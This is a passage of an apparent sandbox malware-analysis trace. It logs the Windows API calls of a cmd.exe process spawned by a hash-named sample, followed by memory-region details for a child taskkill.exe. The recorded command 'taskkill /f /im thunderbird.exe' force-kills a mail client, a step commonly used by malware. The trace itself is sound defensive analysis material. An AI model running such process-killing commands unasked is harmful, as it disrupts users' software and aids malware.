(HeapHandle=0x490000, Flags=0x0, Size=0x20c) returned 0x49aa70 [0225.088] GetConsoleTitleW (in: lpConsoleTitle=0x49aa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0225.089] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0225.089] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0225.089] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0225.089] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0225.089] GetProcessHeap () returned 0x490000 [0225.089] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x49bc58 [0225.089] GetProcessHeap () returned 0x490000 [0225.090] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49bc58) returned 1 [0225.091] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0225.091] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0225.091] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0225.091] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0225.091] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0225.091] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0225.091] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0225.091] GetProcessHeap () returned 0x490000 [0225.091] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x49ac88 [0225.091] GetProcessHeap () returned 0x490000 [0225.091] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x1a) returned 0x490578 [0225.092] GetProcessHeap () returned 0x490000 [0225.092] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x3a) returned 0x49ace8 [0225.093] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0225.095] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0225.095] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0225.095] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0225.095] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0225.095] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0225.095] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0225.095] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0225.095] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0225.095] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0225.095] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0225.095] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0225.096] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0225.096] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0225.096] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0225.096] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0225.096] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0225.096] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0225.096] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0225.096] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0225.096] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0225.096] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0225.096] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0225.096] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0225.096] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0225.096] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0225.096] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0225.096] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0225.096] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0225.097] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0225.097] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0225.097] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0225.097] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0225.097] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0225.097] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0225.097] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0225.097] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0225.097] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0225.097] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0225.097] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0225.097] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0225.097] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0225.097] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0225.097] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0225.097] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0225.097] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0225.097] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0225.097] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0225.097] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0225.097] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0225.097] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0225.098] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0225.098] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0225.098] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0225.098] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0225.098] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0225.098] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0225.098] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0225.098] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0225.098] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0225.098] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0225.098] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0225.098] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0225.098] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0225.098] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0225.098] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0225.098] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0225.098] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0225.098] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0225.098] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0225.098] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0225.098] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0225.098] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0225.098] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0225.098] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0225.098] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0225.098] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0225.099] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0225.099] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0225.099] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0225.099] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0225.099] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0225.099] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0225.099] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0225.099] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0225.099] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0225.099] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0225.099] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0225.099] GetProcessHeap () returned 0x490000 [0225.099] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x49ad30 [0225.099] GetProcessHeap () returned 0x490000 [0225.099] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4c) returned 0x49af48 [0225.099] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0225.100] GetProcessHeap () returned 0x490000 [0225.100] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x418) returned 0x4905c8 [0225.100] SetErrorMode (uMode=0x0) returned 0x8003 [0225.100] SetErrorMode (uMode=0x1) returned 0x0 [0225.100] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4905d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0225.100] SetErrorMode (uMode=0x8003) returned 0x1 [0225.100] GetProcessHeap () returned 0x490000 [0225.100] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x4905c8, Size=0x56) returned 0x4905c8 [0225.100] GetProcessHeap () returned 0x490000 [0225.100] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4905c8) returned 0x56 [0225.100] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0225.100] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0225.100] GetProcessHeap () returned 0x490000 [0225.101] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x110) returned 0x49afa0 [0225.101] GetProcessHeap () returned 0x490000 [0225.101] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x218) returned 0x490628 [0225.105] GetProcessHeap () returned 0x490000 [0225.105] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x490628, Size=0x112) returned 0x490628 [0225.105] GetProcessHeap () returned 0x490000 [0225.105] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x490628) returned 0x112 [0225.105] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0225.105] GetProcessHeap () returned 0x490000 [0225.105] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe0) returned 0x49b0b8 [0225.107] GetProcessHeap () returned 0x490000 [0225.107] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49b0b8, Size=0x76) returned 0x49b0b8 [0225.107] GetProcessHeap () returned 0x490000 [0225.107] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49b0b8) returned 0x76 [0225.107] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.107] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0225.107] GetLastError () returned 0x2 [0225.108] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x49b138 [0225.108] GetProcessHeap () returned 0x490000 [0225.108] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x497550 [0225.108] FindClose (in: hFindFile=0x49b138 | out: hFindFile=0x49b138) returned 1 [0225.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0225.108] GetLastError () returned 0x2 [0225.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x49b138 [0225.108] GetProcessHeap () returned 0x490000 [0225.108] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x497550, Size=0x4) returned 0x49b178 [0225.108] FindClose (in: hFindFile=0x49b138 | out: hFindFile=0x49b138) returned 1 [0225.109] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0225.109] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0225.109] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0225.109] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0225.109] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0225.109] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c)) [0225.110] GetProcessHeap () returned 0x490000 [0225.110] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x18) returned 0x4974b0 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.110] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.111] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.111] GetProcessHeap () returned 0x490000 [0225.111] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4974b0) returned 1 [0225.111] GetProcessHeap () returned 0x490000 [0225.111] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa) returned 0x49b138 [0225.111] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0225.114] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im thunderbird.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im thunderbird.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im thunderbird.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x1018, dwThreadId=0x100c)) returned 1 [0225.134] CloseHandle (hObject=0x98) returned 1 [0225.134] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0225.134] GetProcessHeap () returned 0x490000 [0225.134] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x499d58) returned 1 [0225.134] GetEnvironmentStringsW () returned 0x499d58* [0225.135] GetProcessHeap () returned 0x490000 [0225.135] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa76) returned 0x497cc8 [0225.135] FreeEnvironmentStringsA (penv="=") returned 1 [0225.135] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0226.126] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x0) returned 1 [0226.126] CloseHandle (hObject=0x9c) returned 1 [0226.127] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000000") returned 8 [0226.127] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0226.127] GetProcessHeap () returned 0x490000 [0226.128] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x497cc8) returned 1 [0226.128] GetEnvironmentStringsW () returned 0x49b188* [0226.128] GetProcessHeap () returned 0x490000 [0226.128] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa9c) returned 0x497cc8 [0226.128] FreeEnvironmentStringsA (penv="=") returned 1 [0226.128] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0226.128] GetProcessHeap () returned 0x490000 [0226.129] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x497cc8) returned 1 [0226.129] GetEnvironmentStringsW () returned 0x49b188* [0226.129] GetProcessHeap () returned 0x490000 [0226.129] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa9c) returned 0x497cc8 [0226.129] FreeEnvironmentStringsA (penv="=") returned 1 [0226.129] GetProcessHeap () returned 0x490000 [0226.129] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49b138) returned 1 [0226.129] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0226.129] _get_osfhandle (_FileHandle=1) returned 0x130 [0226.129] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0226.129] _get_osfhandle (_FileHandle=1) returned 0x130 [0226.129] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0226.130] _get_osfhandle (_FileHandle=0) returned 0x158 [0226.130] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0226.130] GetConsoleOutputCP () returned 0x1b5 [0226.130] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0226.130] SetThreadUILanguage (LangId=0x0) returned 0x409 [0226.131] exit (_Code=0) Thread: id = 400 os_tid = 0xb58 Process: id = "80" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2d308000" os_pid = "0x1018" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "79" os_parent_pid = "0x8e8" cmd_line = "taskkill /f /im thunderbird.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5664 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5665 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5666 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5667 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5668 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 5669 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 5670 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5671 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 5672 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 5673 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5674 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 5675 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5676 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5677 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5678 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5679 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5680 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5681 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5682 start_va = 0x4400000 end_va = 0x458ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 5683 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5684 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5685 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5686 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5687 start_va = 0x4590000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 5688 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5689 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5690 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5691 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5692 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5693 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5694 start_va = 0x74650000 